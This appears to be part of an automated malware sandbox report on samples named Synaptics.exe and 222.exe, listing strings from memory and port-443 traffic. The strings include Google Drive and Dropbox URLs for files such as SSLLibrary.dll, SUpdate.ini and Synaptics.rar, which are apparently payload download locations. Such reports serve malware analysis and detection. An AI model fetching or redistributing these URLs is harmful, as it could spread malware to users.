                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2138541996.000000000073F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2661885047.000000000F285000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads
                              Source: Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads.goo
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsG
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadse
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadst#
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007AB9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.0000000005616000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.00000000055B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt1
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtd
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007A71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtent=
                              Source: Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadth
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadts
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2138541996.000000000073F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F285000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu2
                              Source: Synaptics.exe, 00000003.00000002.2638834850.0000000005530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu9.O
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F285000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu?
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadua
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduh/LR
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadul
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007A71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadund
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007A71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvi
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadviL
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvn
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2138541996.0000000000775000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000774000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw
                              Source: Synaptics.exe, 00000003.00000002.2635210008.00000000006FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw.#O
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadwM
                              Source: Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadwp
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007AB9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2138541996.0000000000775000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000774000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxM
                              Source: Synaptics.exe, 00000003.00000003.2138173802.000000000561A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.0000000005616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxkNL/
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2661885047.000000000F285000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000715000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.00000000055B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady
                              Source: Synaptics.exe, 00000003.00000002.2635210008.00000000006FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady(PN
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F285000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady9
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyA
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyf
                              Source: Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyndic
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyoS
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.00000000055B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadz
                              Source: Synaptics.exe, 00000003.00000003.2138541996.000000000073F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadzB
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~
                              Source: Synaptics.exe, 00000003.00000002.2638834850.0000000005530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~9
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~h2LS
                              Source: 222.exe, 00000000.00000003.2022602971.00000000024F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloX
                              Source: 222.exe, 00000000.00000003.2022602971.00000000024F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloXO
                              Source: ~DF6A3EB0BE5C6F998C.TMP.4.drString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
                              Source: Synaptics.exe, 00000003.00000002.2636824371.0000000002160000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloadN
                              Source: Synaptics.exe, 00000003.00000003.2138173802.00000000055C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/x-cn.com
                              Source: Synaptics.exe, 00000003.00000002.2638834850.0000000005530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
                              Source: Synaptics.exe, 00000003.00000002.2638834850.0000000005530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/Z
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007A71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/d
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007A71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/d&
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007A71000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.0000000005530000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                              Source: Synaptics.exe, 00000003.00000002.2638834850.0000000005530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007AE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?o
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007AEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadW
                              Source: Synaptics.exe, 00000003.00000002.2638834850.0000000005530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhIuB
                              Source: Synaptics.exe, 00000003.00000002.2638834850.0000000005530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhIuBZ
                              Source: Synaptics.exe, 00000003.00000002.2638834850.0000000005530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtdx%
                              Source: RCX6FEC.tmp.0.drString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
                              Source: Synaptics.exe, 00000003.00000002.2636824371.0000000002160000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:
                              Source: 222.exe, 00000000.00000003.2022602971.00000000024F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=8
                              Source: 222.exe, 00000000.00000003.2022602971.00000000024F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl
                              Source: RCX6FEC.tmp.0.drString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
                              Source: Synaptics.exe, 00000003.00000002.2636824371.0000000002160000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16
                              Source: ~DF6A3EB0BE5C6F998C.TMP.4.drString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
                              Source: Synaptics.exe, 00000003.00000002.2636824371.0000000002160000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
